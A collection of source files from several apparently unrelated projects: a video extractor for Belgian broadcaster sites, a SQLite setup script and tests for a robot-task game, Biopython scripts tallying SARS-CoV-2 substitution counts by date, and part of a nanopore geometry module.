elif code == 'INVALID_LOCATION':
self.raise_geo_restricted(countries=['BE'])
raise ExtractorError(data.get('message') or code, expected=True)
title = data['title']
description = data.get('description')
formats = []
subtitles = {}
for target in data['targetUrls']:
format_url, format_type = url_or_none(target.get('url')), str_or_none(target.get('type'))
if not format_url or not format_type:
continue
format_type = format_type.upper()
if format_type in self._HLS_ENTRY_PROTOCOLS_MAP:
fmts, subs = self._extract_m3u8_formats_and_subtitles(
format_url, video_id, 'mp4', self._HLS_ENTRY_PROTOCOLS_MAP[format_type],
m3u8_id=format_type, fatal=False)
formats.extend(fmts)
subtitles = self._merge_subtitles(subtitles, subs)
elif format_type == 'HDS':
formats.extend(self._extract_f4m_formats(
format_url, video_id, f4m_id=format_type, fatal=False))
elif format_type == 'MPEG_DASH':
fmts, subs = self._extract_mpd_formats_and_subtitles(
format_url, video_id, mpd_id=format_type, fatal=False)
formats.extend(fmts)
subtitles = self._merge_subtitles(subtitles, subs)
elif format_type == 'HSS':
fmts, subs = self._extract_ism_formats_and_subtitles(
format_url, video_id, ism_id='mss', fatal=False)
formats.extend(fmts)
subtitles = self._merge_subtitles(subtitles, subs)
else:
formats.append({
'format_id': format_type,
'url': format_url,
})
self._sort_formats(formats)
subtitle_urls = data.get('subtitleUrls')
if isinstance(subtitle_urls, list):
for subtitle in subtitle_urls:
subtitle_url = subtitle.get('url')
if subtitle_url and subtitle.get('type') == 'CLOSED':
subtitles.setdefault('nl', []).append({'url': subtitle_url})
return {
'id': video_id,
'display_id': video_id,
'title': title,
'description': description,
'formats': formats,
'duration': float_or_none(data.get('duration'), 1000),
'thumbnail': data.get('posterImageUrl'),
'subtitles': subtitles,
}
class CanvasEenIE(InfoExtractor):
IE_DESC = 'canvas.be and een.be'
_VALID_URL = r'https?://(?:www\.)?(?P<site_id>canvas|een)\.be/(?:[^/]+/)*(?P<id>[^/?#&]+)'
_TESTS = [{
'url': 'http://www.canvas.be/video/de-afspraak/najaar-2015/de-afspraak-veilt-voor-de-warmste-week',
'md5': 'ed66976748d12350b118455979cca293',
'info_dict': {
'id': 'mz-ast-5e5f90b6-2d72-4c40-82c2-e134f884e93e',
'display_id': 'de-afspraak-veilt-voor-de-warmste-week',
'ext': 'flv',
'title': 'De afspraak veilt voor de Warmste Week',
'description': 'md5:24cb860c320dc2be7358e0e5aa317ba6',
'thumbnail': r're:^https?://.*\.jpg$',
'duration': 49.02,
},
'expected_warnings': ['is not a supported codec'],
}, {
# with subtitles
'url': 'http://www.canvas.be/video/panorama/2016/pieter-0167',
'info_dict': {
'id': 'mz-ast-5240ff21-2d30-4101-bba6-92b5ec67c625',
'display_id': 'pieter-0167',
'ext': 'mp4',
'title': 'Pieter 0167',
'description': 'md5:943cd30f48a5d29ba02c3a104dc4ec4e',
'thumbnail': r're:^https?://.*\.jpg$',
'duration': 2553.08,
'subtitles': {
'nl': [{
'ext': 'vtt',
}],
},
},
'params': {
'skip_download': True,
},
'skip': 'Pagina niet gevonden',
}, {
'url': 'https://www.een.be/thuis/emma-pakt-thilly-aan',
'info_dict': {
'id': 'md-ast-3a24ced2-64d7-44fb-b4ed-ed1aafbf90b8',
'display_id': 'emma-pakt-thilly-aan',
'ext': 'mp4',
'title': 'Emma pakt Thilly aan',
'description': 'md5:c5c9b572388a99b2690030afa3f3bad7',
'thumbnail': r're:^https?://.*\.jpg$',
'duration': 118.24,
},
'params': {
'skip_download': True,
},
'expected_warnings': ['is not a supported codec'],
}, {
'url': 'https://www.canvas.be/check-point/najaar-2016/de-politie-uw-vriend',
'only_matching': True,
}]
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
site_id, display_id = mobj.group('site_id'), mobj.group('id')
webpage = self._download_webpage(url, display_id)
title = strip_or_none(self._search_regex(
r'<h1[^>]+class="video__body__header__title"[^>]*>(.+?)</h1>',
webpage, 'title', default=None) or self._og_search_title(
webpage, default=None))
video_id = self._html_search_regex(
r'data-video=(["\'])(?P<id>(?:(?!\1).)+)\1', webpage, 'video id',
group='id')
return {
'_type': 'url_transparent',
'url': 'https://mediazone.vrt.be/api/v1/%s/assets/%s' % (site_id, video_id),
'ie_key': CanvasIE.ie_key(),
'id': video_id,
'display_id': display_id,
'title': title,
'description': self._og_search_description(webpage),
}
class VrtNUIE(GigyaBaseIE):
IE_DESC = 'VrtNU.be'
_VALID_URL = r'https?://(?:www\.)?vrt\.be/vrtnu/a-z/(?:[^/]+/){2}(?P<id>[^/?#&]+)'
_TESTS = [{
# Available via old API endpoint
'url': 'https://www.vrt.be/vrtnu/a-z/postbus-x/1989/postbus-x-s1989a1/',
'info_dict': {
'id': 'pbs-pub-e8713dac-899e-41de-9313-81269f4c04ac$vid-90c932b1-e21d-4fb8-99b1-db7b49cf74de',
'ext': 'mp4',
'title': 'Postbus X - Aflevering 1 (Seizoen 1989)',
'description': 'md5:b704f669eb9262da4c55b33d7c6ed4b7',
'duration': 1457.04,
'thumbnail': r're:^https?://.*\.jpg$',
'series': 'Postbus X',
'season': 'Seizoen 1989',
'season_number': 1989,
'episode': 'De zwarte weduwe',
'episode_number': 1,
'timestamp': 1595822400,
'upload_date': '20200727',
},
'skip': 'This video is only available for registered users',
'params': {
'username': '<snip>',
'password': '<<PASSWORD>>',
},
'expected_warnings': ['is not a supported codec'],
}, {
# Only available via new API endpoint
'url': 'https://www.vrt.be/vrtnu/a-z/kamp-waes/1/kamp-waes-s1a5/',
'info_dict': {
'id': 'pbs-pub-0763b56c-64fb-4d38-b95b-af60bf433c71$vid-ad36a73c-4735-4f1f-b2c0-a38e6e6aa7e1',
'ext': 'mp4',
'title': 'Aflevering 5',
'description': 'Wie valt door de mand tijdens een missie?',
'duration': 2967.06,
'season': 'Season 1',
'season_number': 1,
'episode_number': 5,
},
'skip': 'This video is only available for registered users',
'params': {
'username': '<snip>',
'password': '<<PASSWORD>>',
},
'expected_warnings': ['Unable to download asset JSON', 'is not a supported codec', 'Unknown MIME type'],
}]
_NETRC_MACHINE = 'vrtnu'
_APIKEY = '<KEY>'
_CONTEXT_ID = 'R3595707040'
def _real_initialize(self):
self._login()
def _login(self):
username, password = self._get_login_info()
if username is None:
return
auth_info = self._download_json(
'https://accounts.vrt.be/accounts.login', None,
note='Login data', errnote='Could not get Login data',
headers={}, data=urlencode_postdata({
'loginID': username,
'password': password,
'sessionExpiration': '-2',
'APIKey': self._APIKEY,
'targetEnv': 'jssdk',
}))
# Sometimes authentication fails for no good reason, retry
login_attempt = 1
while login_attempt <= 3:
try:
self._request_webpage('https://token.vrt.be/vrtnuinitlogin',
None, note='Requesting XSRF Token', errnote='Could not get XSRF Token',
query={'provider': 'site', 'destination': 'https://www.vrt.be/vrtnu/'})
post_data = {
'UID': auth_info['UID'],
'UIDSignature': auth_info['UIDSignature'],
'signatureTimestamp': auth_info['signatureTimestamp'],
'client_id': 'vrtnu-site',
'_csrf': self._get_cookies('https://login.vrt.be').get('OIDCXSRF').value,
}
self._request_webpage(
'https://login.vrt.be/perform_login',
None, note='Requesting a token', errnote='Could not get a token',
headers={}, data=urlencode_postdata(post_data))
except ExtractorError as e:
if isinstance(e.cause, compat_HTTPError) and e.cause.code == 401:
login_attempt += 1
self.report_warning('Authentication failed')
self._sleep(1, None, msg_template='Waiting for %(timeout)s seconds before trying again')
else:
raise e
else:
break
def _real_extract(self, url):
display_id = self._match_id(url)
webpage = self._download_webpage(url, display_id)
attrs = extract_attributes(self._search_regex(
r'(<nui-media[^>]+>)', webpage, 'media element'))
video_id = attrs['videoid']
publication_id = attrs.get('publicationid')
if publication_id:
video_id = publication_id + '$' + video_id
page = (self._parse_json(self._search_regex(
            r'digitalData\s*=\s*({.+?});', webpage, 'digital data',
default='{}'), video_id, fatal=False) or {}).get('page') or {}
info = self._search_json_ld(webpage, display_id, default={})
return merge_dicts(info, {
'_type': 'url_transparent',
'url': 'https://mediazone.vrt.be/api/v1/vrtvideo/assets/%s' % video_id,
'ie_key': CanvasIE.ie_key(),
'id': video_id,
'display_id': display_id,
'season_number': int_or_none(page.get('episode_season')),
})
class DagelijkseKostIE(InfoExtractor):
IE_DESC = 'dagelijksekost.een.be'
_VALID_URL = r'https?://dagelijksekost\.een\.be/gerechten/(?P<id>[^/?#&]+)'
_TEST = {
'url': 'https://dagelijksekost.een.be/gerechten/hachis-parmentier-met-witloof',
'md5': '30bfffc323009a3e5f689bef6efa2365',
'info_dict': {
'id': 'md-ast-27a4d1ff-7d7b-425e-b84f-a4d227f592fa',
'display_id': 'hachis-parmentier-met-witloof',
'ext': 'mp4',
'title': 'Hachis parmentier met witloof',
'description': 'md5:9960478392d87f63567b5b117688cdc5',
'thumbnail': r're:^https?://.*\.jpg$',
'duration': 283.02,
},
'expected_warnings': ['is not a supported codec'],
}
def _real_extract(self, url):
display_id = self._match_id(url)
webpage = self._download_webpage(url, display_id)
title = strip_or_none(get_element_by_class(
'dish-metadata__title', webpage
) or self._html_search_meta(
'twitter:title', webpage))
description = clean_html(get_element_by_class(
'dish-description', webpage)
) or self._html_search_meta(
('description', 'twitter:description', 'og:description'),
webpage)
video_id = self._html_search_regex(
r'data-url=(["\'])(?P<id>(?:(?!\1).)+)\1', webpage, 'video id',
group='id')
return {
'_type': 'url_transparent',
'url': 'https://mediazone.vrt.be/api/v1/dako/assets/%s' % video_id,
'ie_key': CanvasIE.ie_key(),
'id': video_id,
'display_id': display_id,
'title': title,
'description': description,
}
``` |
{
"source": "jhwinter/bot-o-mat",
"score": 3
} |
#### File: commands/test/test_robot_type.py
```python
import contextlib
import pathlib
import unittest
import bot_o_mat.utils.db_connect
import bot_o_mat.commands.robot_type
data_dir: pathlib.Path = pathlib.Path(__file__).parent.parent.parent.joinpath(
"data"
).resolve()
connection = bot_o_mat.utils.db_connect.open_db(path=data_dir)
class TestRobotType(unittest.TestCase):
"""Class for unit testing robot_type module
:param unittest: [description]
:type unittest: [type]
"""
def test_get_robot_types(self):
"""[summary]
"""
with contextlib.closing(connection.cursor()) as cursor:
result = bot_o_mat.commands.robot_type.get_robot_types(
cursor=cursor
)
self.assertIsInstance(result, list)
[
self.assertIsInstance(element, dict)
for element in result
]
self.assertGreaterEqual(len(result), 6)
def test_robot_type_exists(
self,
robot_type: str = "Unipedal",
expected_value: bool = True
):
"""[summary]
"""
with contextlib.closing(connection.cursor()) as cursor:
result = bot_o_mat.commands.robot_type.robot_type_exists(
cursor=cursor,
type=robot_type
)
self.assertEqual(result, expected_value)
def test_robot_type_exists_fails(self):
"""[summary]
"""
self.test_robot_type_exists(robot_type="asdfa", expected_value=False)
def test_all_robot_types_succeed(self):
"""[summary]
"""
with contextlib.closing(connection.cursor()) as cursor:
robot_types: list = bot_o_mat.commands.robot_type.get_robot_types(
cursor=cursor
)
[
self.test_robot_type_exists(
robot_type=robot_type.get("id"),
expected_value=True
)
for robot_type in robot_types
]
if __name__ == "__main__":
unittest.main()
bot_o_mat.utils.db_connect.close_db(connection=connection)
```
#### File: bot-o-mat/scripts/setup_db.py
```python
import pathlib
import sqlite3
import sys
def initialize_robot_type_table(cursor: sqlite3.Cursor) -> bool:
"""Creates and populates the robot_type table with default values
:param cursor: [description]
:type cursor: sqlite3.Cursor
:return: [description]
:rtype: bool
"""
def create() -> bool:
"""Create robot_type table
:return: [description]
:rtype: bool
"""
cursor.execute(
'''
CREATE TABLE robot_type(
id TEXT PRIMARY KEY NOT NULL,
name TEXT UNIQUE NOT NULL
);
'''
)
cursor.connection.commit()
return True
def populate() -> bool:
"""Populate robot_type table
:return: [description]
:rtype: bool
"""
robot_type_sequence: list = [
("UNIPEDAL", "Unipedal"),
("BIPEDAL", "Bipedal"),
("QUADRUPEDAL", "Quadrupedal"),
("ARACHNID", "Arachnid"),
("RADIAL", "Radial"),
("AERONAUTICAL", "Aeronautical")
]
cursor.executemany(
"INSERT INTO robot_type(id, name) VALUES (?, ?)",
robot_type_sequence
)
cursor.connection.commit()
return True
if create() and populate():
return True
return False
def initialize_task_table(cursor: sqlite3.Cursor) -> bool:
"""Creates and populates the task table with default values
:param cursor: [description]
:type cursor: sqlite3.Cursor
:return: [description]
:rtype: bool
"""
def create() -> bool:
"""Create task table
:return: [description]
:rtype: bool
"""
cursor.execute(
'''
CREATE TABLE task(
id INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL,
description TEXT UNIQUE NOT NULL,
eta INT NOT NULL,
robot_type TEXT NOT NULL DEFAULT ""
);
'''
)
cursor.connection.commit()
return True
def populate() -> bool:
"""Populate task table
:return: [description]
:rtype: bool
"""
tasks: list = [
{
"description": "do the dishes",
"eta": 1000
},
{
"description": "sweep the house",
"eta": 3000
},
{
"description": "do the laundry",
"eta": 10000
},
{
"description": "take out the recycling",
"eta": 4000
},
{
"description": "make a sammich",
"eta": 7000
},
{
"description": "mow the lawn",
"eta": 20000
},
{
"description": "rake the leaves",
"eta": 18000
},
{
"description": "give the dog a bath",
"eta": 14500
},
{
"description": "bake some cookies",
"eta": 8000
},
{
"description": "wash the car",
"eta": 20000
}
]
task_sequence: list = [
(task.get("description"), task.get("eta"))
for task in tasks
]
cursor.executemany(
"INSERT INTO task(description, eta) VALUES (?, ?)",
task_sequence
)
cursor.connection.commit()
return True
def populate_type_specific_tasks() -> bool:
"""Populate task table with type-specific tasks
:return: [description]
:rtype: bool
"""
tasks: list = [
{
"description": "hop on one leg",
"eta": 3000,
"robot_type": "UNIPEDAL"
},
{
"description": "do jumping jacks",
"eta": 10000,
"robot_type": "BIPEDAL"
},
{
"description": "outrun a dog",
"eta": 5000,
"robot_type": "QUADRUPEDAL"
},
{
"description": "clean the ceiling",
"eta": 20000,
"robot_type": "ARACHNID"
},
{
"description": "roll down the stairs",
"eta": 7000,
"robot_type": "RADIAL"
},
{
"description": "collect water from the clouds",
"eta": 20000,
"robot_type": "AERONAUTICAL"
}
]
task_sequence: list = [
(task.get("description"), task.get("eta"), task.get("robot_type"))
for task in tasks
]
cursor.executemany(
"INSERT INTO task(description, eta, robot_type) VALUES (?, ?, ?)",
task_sequence
)
cursor.connection.commit()
return True
if create() and populate() and populate_type_specific_tasks():
return True
return False
def create_robot_table(cursor: sqlite3.Cursor) -> bool:
"""Create robot table
:param cursor: [description]
:type cursor: sqlite3.Cursor
:return: [description]
:rtype: bool
"""
cursor.execute(
'''
CREATE TABLE robot(
id INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL,
name TEXT UNIQUE NOT NULL,
robot_type_id TEXT NOT NULL,
FOREIGN KEY(robot_type_id)
REFERENCES robot_type(id)
ON UPDATE CASCADE
ON DELETE CASCADE
);
'''
)
cursor.connection.commit()
return True
def create_leaderboard_table(cursor: sqlite3.Cursor) -> bool:
"""Create leaderboard table
:param cursor: [description]
:type cursor: sqlite3.Cursor
:return: [description]
:rtype: bool
"""
cursor.execute(
'''
CREATE TABLE leaderboard(
id INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL,
robot_id INT NOT NULL,
task_1_score INT NOT NULL DEFAULT 0,
task_2_score INT NOT NULL DEFAULT 0,
task_3_score INT NOT NULL DEFAULT 0,
task_4_score INT NOT NULL DEFAULT 0,
task_5_score INT NOT NULL DEFAULT 0,
task_6_score INT NOT NULL DEFAULT 0,
task_7_score INT NOT NULL DEFAULT 0,
task_8_score INT NOT NULL DEFAULT 0,
task_9_score INT NOT NULL DEFAULT 0,
task_10_score INT NOT NULL DEFAULT 0,
task_11_score INT NOT NULL DEFAULT 0,
task_12_score INT NOT NULL DEFAULT 0,
task_13_score INT NOT NULL DEFAULT 0,
task_14_score INT NOT NULL DEFAULT 0,
task_15_score INT NOT NULL DEFAULT 0,
task_16_score INT NOT NULL DEFAULT 0,
FOREIGN KEY(robot_id)
REFERENCES robot(id)
ON UPDATE CASCADE
ON DELETE CASCADE
);
'''
)
cursor.connection.commit()
return True
def main(path: pathlib.Path = pathlib.Path(__file__).parent.parent.joinpath(
"bot_o_mat",
"data",
).resolve()
):
"""Create bot_o_mat.db if it does not already exist in bot_o_mat/data
"""
database_file: pathlib.Path = path.joinpath("bot_o_mat.db").resolve()
if not path.exists():
path.mkdir(exist_ok=True)
if not database_file.is_file():
with sqlite3.connect(database_file) as connection:
print("Opened connection to database successfully\n")
# must enable foreign_keys for each connection
connection.cursor().execute("PRAGMA foreign_keys = 1")
connection.commit()
if initialize_robot_type_table(connection.cursor()):
print("robot type table created and populated")
if initialize_task_table(connection.cursor()):
print("task table created and populated")
if create_robot_table(connection.cursor()):
print("robot table created successfully")
if create_leaderboard_table(connection.cursor()):
print("leaderboard table created successfully")
print(
"\nClosed connection to database successfully",
"\nSQLite Database successfully configured\n"
)
return True
print(f"{database_file} already exists")
if __name__ == "__main__":
main()
sys.exit()
```
#### File: scripts/test/test_setup_db.py
```python
import contextlib
import pathlib
import unittest
import bot_o_mat.utils.db_connect
import scripts.setup_db
data_dir: pathlib.Path = pathlib.Path(__file__).parent.parent.parent.joinpath(
"data"
).resolve()
connection = bot_o_mat.utils.db_connect.open_db(path=data_dir)
class TestSetupDB(unittest.TestCase):
"""Class for unit testing setup_db script
:param unittest: [description]
:type unittest: [type]
"""
def test_initialize_robot_type_table(self):
"""Test 1
"""
with contextlib.closing(connection.cursor()) as cursor:
result = scripts.setup_db.initialize_robot_type_table(
cursor=cursor
)
self.assertEqual(result, True)
def test_initialize_task_table(self):
"""Test 2
"""
with contextlib.closing(connection.cursor()) as cursor:
result = scripts.setup_db.initialize_task_table(cursor=cursor)
self.assertEqual(result, True)
def test_create_robot_table(self):
"""Test 3
"""
with contextlib.closing(connection.cursor()) as cursor:
result = scripts.setup_db.create_robot_table(cursor=cursor)
self.assertEqual(result, True)
def test_create_leaderboard_table(self):
"""Test 4
"""
with contextlib.closing(connection.cursor()) as cursor:
result = scripts.setup_db.create_leaderboard_table(cursor=cursor)
self.assertEqual(result, True)
def test_main(self):
"""this test assumes a non-existent database
"""
pass
if __name__ == "__main__":
unittest.main()
bot_o_mat.utils.db_connect.close_db(connection=connection)
``` |
{
"source": "jhwnkim/covid-mut-rate",
"score": 2
} |
#### File: jhwnkim/covid-mut-rate/data-import-mpi.py
```python
import sys
import traceback
import multiprocessing
from Bio import SeqIO
from Bio import Align
from Bio.Align.substitution_matrices import Array
def get_meta_fasta(record):
import re
tokens = re.split(r'\|', record.description)
metadata = {
'id': record.id,
'collect-date': tokens[-1],
'country': tokens[-2]
}
print(metadata)
return metadata
def mutation_array(seq1, seq2):
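    # Local pairwise alignment (match/mismatch scores plus affine gap penalties), then tally
    # substitutions between aligned columns into a 5x5 ACGTN count matrix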
aligner = Align.PairwiseAligner()
aligner.mode = 'local'
aligner.match_score = 2
aligner.mismatch_score = -3
aligner.open_gap_score = -7
aligner.extend_gap_score = -2
alignments = aligner.align(seq1, seq2)
alignment = alignments[0]
frequency = Array("ACGTN", dims=2)
for (start1, end1), (start2, end2) in zip(*alignment.aligned):
se1 = seq1[start1:end1]
se2 = seq2[start2:end2]
for c1, c2 in zip(se1, se2):
frequency[c1, c2] += 1
print(frequency)
mut_rate = frequency
print(mut_rate)
return mut_rate
def main():
# Read Covid19 reference sequence
ref = SeqIO.read("./data/ref_sequence.gb", "genbank")
print('Reference Covid sequence')
print(ref.id)
print(repr(ref.seq))
print(len(ref.seq))
# Read downloaded sequence file from NCBI GenBank Virus site
print(sys.argv)
if len(sys.argv) > 1:
infile = sys.argv[1]
else:
infile = "./data/MA-sequences-2-toy.fasta"
records = list( SeqIO.parse(infile, "fasta") )
metadata = []
mutarray = []
import time
start = time.time()
for idx, record in enumerate(records):
print('\n{} of {} records'.format(idx+1, len(records)))
try:
meta = get_meta_fasta(record)
mut = mutation_array(ref.seq, record.seq)
except:
print(traceback.format_exc())
else:
metadata.append(meta)
mutarray.append(mut)
dates = []
mutarray_avg = []
ids = []
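    # Group per-record count matrices by collection date, inserting so that dates stay sorted;
    # matrices sharing a date are summed here and averaged below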
for idx, rec in enumerate(metadata):
if len(mutarray_avg) ==0 or rec['collect-date'] > dates[-1]:
dates.append(rec['collect-date'])
ids.append([rec['id']])
mutarray_avg.append(mutarray[idx])
else:
for i in range(len(mutarray_avg)):
if rec['collect-date']< dates[i]:
dates.insert(i, rec['collect-date'])
ids.insert(i,[rec['id']])
mutarray_avg.insert(i, mutarray[idx])
break
elif rec['collect-date'] == dates[i]:
ids[i].append(rec['id'])
mutarray_avg[i] += mutarray[idx]
break
# Divide mutation rate by counts and convert to float Array
mutvec_out = []
for idx, idlist in enumerate(ids):
mutarray_avg[idx] = mutarray_avg[idx]/len(idlist)
print(dates[idx])
print(idlist)
print(mutarray_avg[idx])
mutvec = [ \
mutarray_avg[idx]["A", "C"], \
mutarray_avg[idx]["A", "T"], \
mutarray_avg[idx]["A", "G"], \
mutarray_avg[idx]["C", "A"], \
mutarray_avg[idx]["C", "T"], \
mutarray_avg[idx]["C", "G"], \
mutarray_avg[idx]["T", "A"], \
mutarray_avg[idx]["T", "C"], \
mutarray_avg[idx]["T", "G"], \
mutarray_avg[idx]["G", "A"], \
mutarray_avg[idx]["G", "C"], \
mutarray_avg[idx]["G", "T"]]
mutvec_out.append([float(x) for x in mutvec])
# print('{:e}'.format(mutarray_avg[0]['C', 'T']))
# Save to file
import pandas as pd
# outfile = './data/MA-sequences-1-toy1.csv'
# outfile = './data/MA-sequences-2-toy.csv'
outfile = infile[:-5] + '.csv'
df = pd.DataFrame({"Dates": dates})
df = pd.concat( [df, \
pd.DataFrame(mutvec_out, columns=['A->C', 'A->T', 'A->G', \
'C->A', 'C->T', 'C->G', \
'T->A', 'T->C', 'T->G', \
'G->A', 'G->C', 'G->T'])], axis=1)
df = pd.concat( [df, \
pd.DataFrame({"N": [len(idlist) for idlist in ids]})], axis=1)
print(df)
df.to_csv(outfile, index=False)
print('Run time took {}'.format(time.strftime("%H:%M:%S", time.gmtime(time.time()-start))))
'''
To read data
# load file with pandas
import pandas as pd
outfile = './data/MA-sequences-1-toy1.csv'
df = pd.read_csv(outfile)
# convert to list and numpy array
dates = df['Dates'].values.tolist() # in strings
mutrates = df.iloc[:,1:13].to_numpy()
print(df)
'''
if __name__ == "__main__":
main()
```
#### File: jhwnkim/covid-mut-rate/data-import-muscle.py
```python
from Bio import SeqIO
import traceback
# Read Covid19 reference sequence
ref = SeqIO.read("./data/ref_sequence.gb", "genbank")
print('Reference Covid sequence')
print(ref.id)
print(repr(ref.seq))
print(len(ref.seq))
def get_meta_fasta(record):
import re
tokens = re.split(r'\|', record.description)
metadata = {
'id': record.id,
'collect-date': tokens[-1],
'country': tokens[-2]
}
print(metadata)
return metadata
from Bio import Align
from Bio.Align.substitution_matrices import Array
from Bio.Align.Applications import MuscleCommandline
import subprocess
# muscle_bin = r"/home/gridsan/jhwnkim/git-repo/tools/muscle3.8.31/src/muscle"
# muscle_in = r"/home/gridsan/jhwnkim/tmp/muscle_in.fasta"
# muscle_out= r"/home/gridsan/jhwnkim/tmp/muscle_out.fasta"
muscle_bin = "./muscle3.8.31_i86win32.exe"
muscle_in = "./tmp/muscle_in.fasta"
muscle_out= "./tmp/muscle_out.fasta"
def mutation_array(seq1, seq2): # pass as SeqRecord
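    # Write both records to FASTA, align them with the external MUSCLE binary, read the
    # alignment from its stdout, and count aligned column pairs (including gaps '-') into a 6x6 matrix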
SeqIO.write([seq1, seq2], muscle_in, "fasta")
#muscle_cline = MuscleCommandline(muscle_bin, input=muscle_in)
#print(muscle_cline)
#child = subprocess.Popen(muscle_cline, stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True)
muscle_cline = [muscle_bin, "-in", muscle_in]
child = subprocess.Popen(muscle_cline, stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True)
print(muscle_cline)
# aligned_seq = SeqIO.read(muscle_out, "fasta")
aligned_seq = list(SeqIO.parse(child.stdout, "fasta"))
se1 = aligned_seq[0].seq
se2 = aligned_seq[1].seq
frequency = Array("ACGTN-", dims=2)
for c1, c2 in zip(se1, se2):
frequency[c1, c2] += 1
print(frequency)
mut_rate = frequency
#print(mut_rate)
return mut_rate
# Read downloaded sequence file from NCBI GenBank Virus site
infile = "./data/old/MA-sequences-2-toy.fasta"
records = list( SeqIO.parse(infile, "fasta") )
metadata = []
mutarray = []
import time
start = time.time()
for idx, record in enumerate(records):
print('\n{} of {} records'.format(idx+1, len(records)))
try:
meta = get_meta_fasta(record)
mut = mutation_array(ref, record)
except:
print(traceback.format_exc())
else:
metadata.append(meta)
mutarray.append(mut)
dates = []
mutarray_avg = []
ids = []
for idx, rec in enumerate(metadata):
if len(mutarray_avg) ==0 or rec['collect-date'] > dates[-1]:
dates.append(rec['collect-date'])
ids.append([rec['id']])
mutarray_avg.append(mutarray[idx])
else:
for i in range(len(mutarray_avg)):
if rec['collect-date']< dates[i]:
dates.insert(i, rec['collect-date'])
ids.insert(i,[rec['id']])
mutarray_avg.insert(i, mutarray[idx])
break
elif rec['collect-date'] == dates[i]:
ids[i].append(rec['id'])
mutarray_avg[i] += mutarray[idx]
break
# Divide mutation rate by counts and convert to float Array
mutvec_out = []
for idx, idlist in enumerate(ids):
mutarray_avg[idx] = mutarray_avg[idx]/len(idlist)
print(dates[idx])
print(idlist)
print(mutarray_avg[idx])
mutvec = [ \
mutarray_avg[idx]["A", "C"], \
mutarray_avg[idx]["A", "T"], \
mutarray_avg[idx]["A", "G"], \
mutarray_avg[idx]["C", "A"], \
mutarray_avg[idx]["C", "T"], \
mutarray_avg[idx]["C", "G"], \
mutarray_avg[idx]["T", "A"], \
mutarray_avg[idx]["T", "C"], \
mutarray_avg[idx]["T", "G"], \
mutarray_avg[idx]["G", "A"], \
mutarray_avg[idx]["G", "C"], \
mutarray_avg[idx]["G", "T"]]
mutvec_out.append([float(x) for x in mutvec])
# print('{:e}'.format(mutarray_avg[0]['C', 'T']))
# Save to file
import pandas as pd
# outfile = './data/MA-sequences-1-toy1.csv'
# outfile = './data/MA-sequences-2-toy.csv'
outfile = infile[:-5] + '.csv'
df = pd.DataFrame({"Dates": dates})
df = pd.concat( [df, \
pd.DataFrame(mutvec_out, columns=['A->C', 'A->T', 'A->G', \
'C->A', 'C->T', 'C->G', \
'T->A', 'T->C', 'T->G', \
'G->A', 'G->C', 'G->T'])], axis=1)
df = pd.concat( [df, \
pd.DataFrame({"N": [len(idlist) for idlist in ids]})], axis=1)
print(df)
df.to_csv(outfile, index=False)
print('Run time took {}'.format(time.strftime("%H:%M:%S", time.gmtime(time.time()-start))))
'''
To read data
# load file with pandas
import pandas as pd
outfile = './data/MA-sequences-1-toy1.csv'
df = pd.read_csv(outfile)
# convert to list and numpy array
dates = df['Dates'].values.tolist() # in strings
mutrates = df.iloc[:,1:13].to_numpy()
print(df)
'''
``` |
{
"source": "jhwnkim/nanopores",
"score": 2
} |
#### File: nanopores/geometries/allpores.py
```python
import numpy as np
def lazy_import():
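    # Defer the heavy geometry imports until a geometry is actually requested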
global Params, any_params, polygons, MultiPore, Pore, pughpore
global curved, alphahempoly
from nanopores.tools.utilities import Params, any_params
import nanopores.tools.polygons as polygons
from nanopores.geometries.cylpore import MultiPore, Pore
import nanopores.geometries.pughpore as pughpore
import nanopores.geometries.curved as curved
from nanopores.geometries.alphahempoly import poly as alphahempoly
def get_geo(geoname=None, **params):
params["geoname"] = geoname
geoclass = geometries[geoname](**params)
return geoclass.get_geo()
def get_pore(geoname=None, **params):
params["geoname"] = geoname
geoclass = geometries[geoname](**params)
return geoclass.get_pore()
class BasePore(object):
default = dict(
dim = 2,
subs = None,
)
def __init__(self, h=1., reconstruct=False, **params):
lazy_import()
self.params = Params(self.default, **params)
self.h = h
self.reconstruct = reconstruct
def get_geo(self):
return self.build()
def get_pore(self):
pore = self.pore()
pore.build_nogeo()
return pore
class PughPore(BasePore):
@property
def default(self):
return dict(pughpore.params,
geoname = "pugh",
diamPore = 6., # will override l0,.. if set
diamDNA = 2.5, # will override l0,.. if diamPore set
dim = 3,
)
def build(self):
params = self.params
h = self.h
if params.diamPore is not None:
diamPore = params.diamPore # inner (effective) pore diameter
diamDNA = params.diamDNA # dna diameter of outer dna layers
l0 = diamPore + 6.*diamDNA
l1 = diamPore + 4.*diamDNA
l2 = diamPore + 2.*diamDNA
l3 = diamPore
l4 = l1
params.update(l0=l0, l1=l1, l2=l2, l3=l3, l4=l4)
if params.dim == 3:
geo = pughpore.get_geo(h, **params)
if geo.params["x0"] is not None:
molec = curved.Sphere(geo.params["rMolecule"],
geo.params["x0"])
geo.curved = dict(moleculeb = molec.snap)
elif params.dim == 2:
geo = pughpore.get_geo_cyl(h, **params)
if geo.params["x0"] is not None:
molec = curved.Circle(geo.params["rMolecule"],
geo.params["x0"])
geo.curved = dict(moleculeb = molec.snap)
elif params.dim == 1:
geo = pughpore.get_geo1D(h, **params)
return geo
class PughPoreCyl(BasePore):
default = dict(
# specify pore
l0 = 18., #22.5,
l1 = 14., #17.5,
l2 = 10., #12.5,
l3 = 6., #7.5,
l4 = 14., #17.5,
hpore = 46.,
h2 = 46.-35., # 11.
h1 = 46.-35.-2.5, # 8.5
h4 = 10.,
diamPore = 6., # will override l0,.. if set
diamDNA = 2.5, # will override l0,.. if diamPore set
dim = 2,
R = 20.,
H = 70.,
H0 = 60.,
R0 = None,
rMolecule = 2.0779, # molecular radius of protein trypsin
x0 = None,
lcMolecule = 0.2, # relative to global mesh size
lcCenter = 0.5,
hmem = 2.2,
zmem = -46./2. + 2.2/2.,
poreregion = True,
subs = None,
)
def polygon(self):
params = self.params
if params.diamPore is not None:
diamPore = params.diamPore # inner (effective) pore diameter
diamDNA = params.diamDNA # dna diameter of outer dna layers
l0 = diamPore + 6.*diamDNA
l1 = diamPore + 4.*diamDNA
l2 = diamPore + 2.*diamDNA
l3 = diamPore
l4 = l1
params.update(l0=l0, l1=l1, l2=l2, l3=l3, l4=l4)
